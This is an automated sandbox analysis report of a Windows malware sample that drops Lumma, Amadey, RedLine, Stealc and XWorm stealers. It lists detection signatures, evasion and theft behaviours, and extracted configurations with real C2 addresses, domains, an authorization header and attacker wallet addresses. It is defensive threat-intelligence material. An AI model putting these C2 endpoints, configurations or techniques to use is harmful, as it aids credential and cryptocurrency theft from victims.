Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1520590
MD5: b8fc8a5801e3c0172a199430c7dba1d6
SHA1: 2a53f4961410bea07de2259fd7875b30ae6a7856
SHA256: c438ad0f0d3f595677bfd83cfbab377224cdcc7275f7954639c113e767e8ddf5
Tags: exeuser-Bitsight

Detection

LummaC, Amadey, CryptOne, LummaC Stealer, PureLog Stealer, RedLine, Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Amadeys stealer DLL
Yara detected CryptOne packer
Yara detected LummaC Stealer
Yara detected Powershell download and execute
Yara detected PureLog Stealer
Yara detected RedLine Stealer
Yara detected Stealc
Yara detected Vidar stealer
Yara detected XWorm
Yara detected zgRAT
.NET source code contains very large array initializations
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Connects to many ports of the same IP (likely port scanning)
Contains functionality to inject code into remote processes
Creates multiple autostart registry keys
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Injects a PE file into a foreign processes
Installs new ROOT certificates
LummaC encrypted strings found
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
PE file has a writeable .text section
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses process hollowing technique
Sample uses string decryption to hide its real strings
Sigma detected: New RUN Key Pointing to Suspicious Folder
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Yara detected Costura Assembly Loader
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops certificate files (DER)
Enables debug privileges
Enables security privileges
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains an invalid checksum
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara detected Keylogger Generic
Yara signature match

Classification

Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Name: Amadey
Description: Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Name: RedLine Stealer
Description: RedLine Stealer is a malware available on underground forums for sale apparently as a standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development relies on other prominent stealers: Vidar, Raccoon, Mars and RedLine. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, browser extensions and desktop applications of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

AV Detection

Source: file.exe Avira: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\rstxdhuj[1].exe Avira: detection malicious, Label: HEUR/AGEN.1358803
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\crypted[1].exe Avira: detection malicious, Label: HEUR/AGEN.1357677
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\random[1].exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\gold[1].exe Avira: detection malicious, Label: HEUR/AGEN.1351932
Source: 00000023.00000002.3231251960.00000000038A1000.00000004.00000800.00020000.00000000.sdmp Malware Configuration Extractor: Xworm {"C2 url": ["188.190.10.161"], "Port": "4444", "Aes key": "<Xwormmm>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}
Source: 00000002.00000002.2262892966.0000000000201000.00000040.00000001.01000000.00000007.sdmp Malware Configuration Extractor: Amadey {"C2 url": "185.215.113.16/Jo89Ku7d/index.php", "Version": "4.41", "Install Folder": "44111dbc49", "Install File": "axplong.exe"}
Source: 0000001C.00000002.3027013594.00000000038C5000.00000004.00000800.00020000.00000000.sdmp Malware Configuration Extractor: RedLine {"C2 url": "89.105.223.196:29862", "Bot Id": "ERROR RDX", "Authorization Header": "21d3b2e8d7fdeff423c7a5819c5e64ed"}
Source: 00000018.00000002.3030940765.0000000003710000.00000040.00001000.00020000.00000000.sdmp Malware Configuration Extractor: StealC {"C2 url": "http://91.202.233.158/e96ea2db21fa9a1b.php", "Botnet": "default"}
Source: 00000018.00000002.3030940765.0000000003710000.00000040.00001000.00020000.00000000.sdmp Malware Configuration Extractor: Vidar {"C2 url": "http://91.202.233.158/e96ea2db21fa9a1b.php", "Botnet": "default"}
Source: 15.2.RegAsm.exe.400000.1.unpack Malware Configuration Extractor: LummaC {"C2 url": ["lootebarrkeyn.shop", "gutterydhowi.shop", "reinforcenh.shop", "stogeneratmns.shop", "vozmeatillu.shop", "ghostreedmnu.shop", "offensivedzvju.shop", "fragnantbui.shop", "drawzhotdog.shop"], "Build id": "FATE99--Mix"}
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\Nework[1].exe ReversingLabs: Detection: 100%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\crypted[1].exe ReversingLabs: Detection: 100%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\neon[1].exe ReversingLabs: Detection: 13%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\rstxdhuj[1].exe ReversingLabs: Detection: 91%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\gold[1].exe ReversingLabs: Detection: 100%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\needmoney[1].exe ReversingLabs: Detection: 95%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\random[1].exe ReversingLabs: Detection: 44%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\12dsvc[1].exe ReversingLabs: Detection: 68%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\newbundle2[1].exe ReversingLabs: Detection: 87%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\penis[1].exe ReversingLabs: Detection: 33%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\LummaC222222[1].exe ReversingLabs: Detection: 65%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\cccc2[1].exe ReversingLabs: Detection: 79%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\stealc_default2[1].exe ReversingLabs: Detection: 76%
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe ReversingLabs: Detection: 100%
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe ReversingLabs: Detection: 100%
Source: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe ReversingLabs: Detection: 68%
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe ReversingLabs: Detection: 100%
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe ReversingLabs: Detection: 76%
Source: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe ReversingLabs: Detection: 95%
Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe ReversingLabs: Detection: 33%
Source: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exe ReversingLabs: Detection: 100%
Source: C:\Users\user\AppData\Local\Temp\1000314001\LummaC222222.exe ReversingLabs: Detection: 65%
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe ReversingLabs: Detection: 87%
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe ReversingLabs: Detection: 91%
Source: C:\Users\user\AppData\Local\Temp\1000349001\cccc2.exe ReversingLabs: Detection: 79%
Source: C:\Users\user\AppData\Local\Temp\1000354001\c6f71c9f40.exe ReversingLabs: Detection: 44%
Source: C:\Users\user\AppData\Local\Temp\1000356001\neon.exe ReversingLabs: Detection: 13%
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe ReversingLabs: Detection: 55%
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe ReversingLabs: Detection: 91%
Source: C:\Users\user\AppData\Roaming\Ylrdnrwcx.exe ReversingLabs: Detection: 91%
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe ReversingLabs: Detection: 70%
Source: file.exe ReversingLabs: Detection: 55%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\needmoney[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\rstxdhuj[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\Nework[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\random[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\neon[1].exe Joe Sandbox ML: detected
Source: file.exe Joe Sandbox ML: detected
Source: 15.2.RegAsm.exe.400000.1.unpack String decryptor: reinforcenh.shop
Source: 15.2.RegAsm.exe.400000.1.unpack String decryptor: stogeneratmns.shop
Source: 15.2.RegAsm.exe.400000.1.unpack String decryptor: fragnantbui.shop
Source: 15.2.RegAsm.exe.400000.1.unpack String decryptor: drawzhotdog.shop
Source: 15.2.RegAsm.exe.400000.1.unpack String decryptor: vozmeatillu.shop
Source: 15.2.RegAsm.exe.400000.1.unpack String decryptor: offensivedzvju.shop
Source: 15.2.RegAsm.exe.400000.1.unpack String decryptor: ghostreedmnu.shop
Source: 15.2.RegAsm.exe.400000.1.unpack String decryptor: gutterydhowi.shop
Source: 15.2.RegAsm.exe.400000.1.unpack String decryptor: lootebarrkeyn.shop
Source: 15.2.RegAsm.exe.400000.1.unpack String decryptor: lid=%s&j=%s&ver=4.0
Source: 15.2.RegAsm.exe.400000.1.unpack String decryptor: TeslaBrowser/5.5
Source: 15.2.RegAsm.exe.400000.1.unpack String decryptor: - Screen Resoluton:
Source: 15.2.RegAsm.exe.400000.1.unpack String decryptor: - Physical Installed Memory:
Source: 15.2.RegAsm.exe.400000.1.unpack String decryptor: Workgroup: -
Source: 15.2.RegAsm.exe.400000.1.unpack String decryptor: FATE99--Mix
Source: 38.2.InstallUtil.exe.400000.0.unpack String decryptor: 188.190.10.161
Source: 38.2.InstallUtil.exe.400000.0.unpack String decryptor: 4444
Source: 38.2.InstallUtil.exe.400000.0.unpack String decryptor: <IlwAYl63V65*l#>
Source: 38.2.InstallUtil.exe.400000.0.unpack String decryptor: <Xwormmm>
Source: 38.2.InstallUtil.exe.400000.0.unpack String decryptor: XWorm V5.6
Source: 38.2.InstallUtil.exe.400000.0.unpack String decryptor: USB.exe
Source: 38.2.InstallUtil.exe.400000.0.unpack String decryptor: bc1qyrkl2d6y5szrmqdhc4tv5jjavgyrtlcu072d73
Source: 38.2.InstallUtil.exe.400000.0.unpack String decryptor: 0xCF1f6F491C7C6345B2139C0bB9204e64f37BD4e9
Source: 38.2.InstallUtil.exe.400000.0.unpack String decryptor: TVc65vYbkKfbEAqihVbyZuSVVagPux7c7h
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 172.67.162.108:443 -> 192.168.2.6:49635 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.162.108:443 -> 192.168.2.6:49638 version: TLS 1.2
Source: unknown HTTPS traffic detected: 37.140.192.213:443 -> 192.168.2.6:49644 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.64.194:443 -> 192.168.2.6:49646 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.64.194:443 -> 192.168.2.6:49647 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.64.194:443 -> 192.168.2.6:49673 version: TLS 1.2
Source: Binary string: C:\Windows\System.ServiceModel.pdbpdbdel.pdb source: RegAsm.exe, 0000000B.00000002.3536050802.0000000005D88000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mozglue.pdbP source: stealc_default2.exe, 00000017.00000002.3113843128.000000006958D000.00000002.00000001.01000000.0000001C.sdmp, svchost015.exe, 0000001E.00000002.3461869295.0000000068EFD000.00000002.00000001.01000000.0000001C.sdmp
Source: Binary string: \??\C:\Windows\System.ServiceModel.pdb source: RegAsm.exe, 0000000B.00000002.3536050802.0000000005D88000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: .pdb8 source: axplong.exe, 00000006.00000002.3518419435.0000000000EBB000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: nss3.pdb@ source: stealc_default2.exe, 00000017.00000002.3114439180.000000006974F000.00000002.00000001.01000000.0000001B.sdmp, svchost015.exe, 0000001E.00000002.3468864393.00000000690BF000.00000002.00000001.01000000.0000001B.sdmp
Source: Binary string: System.ServiceModel.pdb693405117-2476756634-1003_Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\Servererver32^ source: RegAsm.exe, 0000000B.00000002.3518496175.0000000000DD0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.ServiceModel.pdb source: RegAsm.exe, 0000000B.00000002.3516704262.0000000000B37000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: System.ServiceModel.pdb source: RegAsm.exe, 0000000B.00000002.3536050802.0000000005DCA000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: nss3.pdb source: stealc_default2.exe, 00000017.00000002.3114439180.000000006974F000.00000002.00000001.01000000.0000001B.sdmp, svchost015.exe, 0000001E.00000002.3468864393.00000000690BF000.00000002.00000001.01000000.0000001B.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.pdb source: RegAsm.exe, 0000000B.00000002.3518496175.0000000000DD0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mozglue.pdb source: stealc_default2.exe, 00000017.00000002.3113843128.000000006958D000.00000002.00000001.01000000.0000001C.sdmp, svchost015.exe, 0000001E.00000002.3461869295.0000000068EFD000.00000002.00000001.01000000.0000001C.sdmp
Source: Binary string: c:\rje\tg\7v\obj\Release\Qrr.pdb source: axplong.exe, 00000006.00000002.3518419435.0000000000F15000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000006.00000003.3252257395.0000000000F15000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000006.00000003.3252600342.0000000000F26000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_0041B6EA FindFirstFileExW, 15_2_0041B6EA
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe File opened: C:\Users\user\AppData
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe File opened: C:\Users\user\AppData\Local
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe File opened: C:\Users\user
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe File opened: C:\Users\user\Documents\desktop.ini
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe File opened: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe File opened: C:\Users\user\AppData\Local\Temp
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 4x nop then mov eax, dword ptr [esp] 16_2_004CD2C0
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 4x nop then jmp eax 16_2_00507600
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 4x nop then mov word ptr [eax], cx 16_2_0050A7E0
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 4x nop then cmp dword ptr [ebx+edx*8], 7E28BDA7h 16_2_0050AC00
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 4x nop then push ebx 16_2_004D5078
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 4x nop then cmp dword ptr [esi+edx*8], 0633C81Dh 16_2_005050E0
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 4x nop then mov byte ptr [ebx], al 16_2_004F40F5
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 4x nop then mov byte ptr [ebx], al 16_2_004F40F5
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 4x nop then movzx edi, byte ptr [eax+esi] 16_2_004C7120
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 4x nop then mov word ptr [eax], cx 16_2_004EA274
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 4x nop then mov word ptr [edx], ax 16_2_004EA274
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 4x nop then mov word ptr [eax], cx 16_2_004EA2F9
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 4x nop then mov word ptr [edx], ax 16_2_004EA2F9
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 4x nop then movzx eax, word ptr [esi+ecx] 16_2_00502280
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 4x nop then mov word ptr [eax], cx 16_2_004EA345
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 4x nop then mov word ptr [edx], ax 16_2_004EA345
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 4x nop then mov eax, dword ptr [esp] 16_2_004EA345
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 4x nop then cmp byte ptr [esi+ebx], 00000000h 16_2_004F1370
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 4x nop then mov ebx, eax 16_2_004CA3C0
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 4x nop then mov ebp, eax 16_2_004CA3C0
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 4x nop then cmp dword ptr [edi+edx*8], 0633C81Dh 16_2_00509390
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 4x nop then mov eax, dword ptr [esp] 16_2_00509390
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 4x nop then cmp dword ptr [esi+edx*8], CECD21FDh 16_2_004EC390
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 4x nop then cmp dword ptr [edi+edx*8], CECD21FDh 16_2_004EC390
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 4x nop then mov eax, dword ptr [esp] 16_2_004E4490
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 4x nop then cmp word ptr [edi+eax+02h], 0000h 16_2_004E04A0
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 4x nop then mov word ptr [eax], dx 16_2_004E04A0
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 4x nop then mov ecx, esi 16_2_004ED56C
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 4x nop then movzx ebx, byte ptr [edx] 16_2_004FB510
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 4x nop then mov eax, dword ptr [esi+000006A8h] 16_2_004DE52C
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 4x nop then mov ecx, esi 16_2_004ED58E
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 4x nop then mov eax, dword ptr [esp] 16_2_004EF5B7
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 4x nop then mov eax, dword ptr [esi] 16_2_004D46B5
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 4x nop then movzx edx, byte ptr [ecx+eax] 16_2_004CF7E0
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 4x nop then mov byte ptr [ebx], al 16_2_004F27B0
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 4x nop then mov eax, dword ptr [esi+20h] 16_2_004F27B0
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 4x nop then mov byte ptr [ebx], al 16_2_004F27B0
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 4x nop then mov byte ptr [ebx], al 16_2_004F27B0
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 4x nop then mov byte ptr [ebx], al 16_2_004F27B0
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 4x nop then mov byte ptr [ebx], al 16_2_004F27B0
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 4x nop then mov byte ptr [edi], al 16_2_004F27B0
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 4x nop then mov byte ptr [edi], al 16_2_004F27B0
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 4x nop then mov byte ptr [ebx], al 16_2_004F27B0
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 4x nop then mov byte ptr [edx], cl 16_2_004F27B0
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 4x nop then mov dword ptr [esp], 00000000h 16_2_004DA880
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 4x nop then cmp al, 2Eh 16_2_004EC891
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 4x nop then xor eax, eax 16_2_004EC891
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 4x nop then cmp dword ptr [ebx+edx*8], 1B788DCFh 16_2_00504970
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 4x nop then cmp dword ptr [edi+edx*8], 54CA534Eh 16_2_005089F0
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 4x nop then mov byte ptr [edi], al 16_2_004F4A2F
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 4x nop then cmp dword ptr [edi+edx*8], 0633C81Dh 16_2_00505AD0
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 4x nop then mov eax, dword ptr [esi] 16_2_004D3AE6
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 4x nop then mov ebx, ecx 16_2_004D3AE6
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 4x nop then cmp byte ptr [edi], 00000000h 16_2_004D3AE6
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 4x nop then jmp edx 16_2_004E7B0F
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 4x nop then mov eax, dword ptr [esp+0Ch] 16_2_004EBB00
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 4x nop then mov ebx, dword ptr [edi+04h] 16_2_004F0BD0
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 4x nop then movzx ecx, word ptr [edi+eax] 16_2_00508BE0
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 4x nop then movzx edx, byte ptr [esi+edi] 16_2_004C4C10
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h 16_2_004E6CA0
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 4x nop then add edi, 02h 16_2_004DDD64
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 4x nop then mov eax, dword ptr [ebx] 16_2_004DDD64
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 4x nop then movzx edx, byte ptr [esi+ebx] 16_2_004C5D20
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 4x nop then mov byte ptr [edi], al 16_2_004F4DF6
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 4x nop then cmp dword ptr [ebx+edx*8], 7E28BDA7h 16_2_0050AD90
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 4x nop then mov eax, dword ptr [esp+0Ch] 16_2_00505D80
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 4x nop then mov eax, dword ptr [esp] 16_2_00509E60
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 4x nop then cmp byte ptr [ebx], 00000000h 16_2_004D4E26
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 4x nop then xor eax, eax 16_2_004D4E26
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 4x nop then mov eax, dword ptr [ebp-10h] 16_2_00507EDE
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 4x nop then mov eax, dword ptr [esi+1Ch] 16_2_004CFEBC
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 4x nop then mov eax, dword ptr [esp] 16_2_0050AF10
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 4x nop then cmp dword ptr [ebp+edx*8+00h], 81105F7Ah 16_2_0050AF10
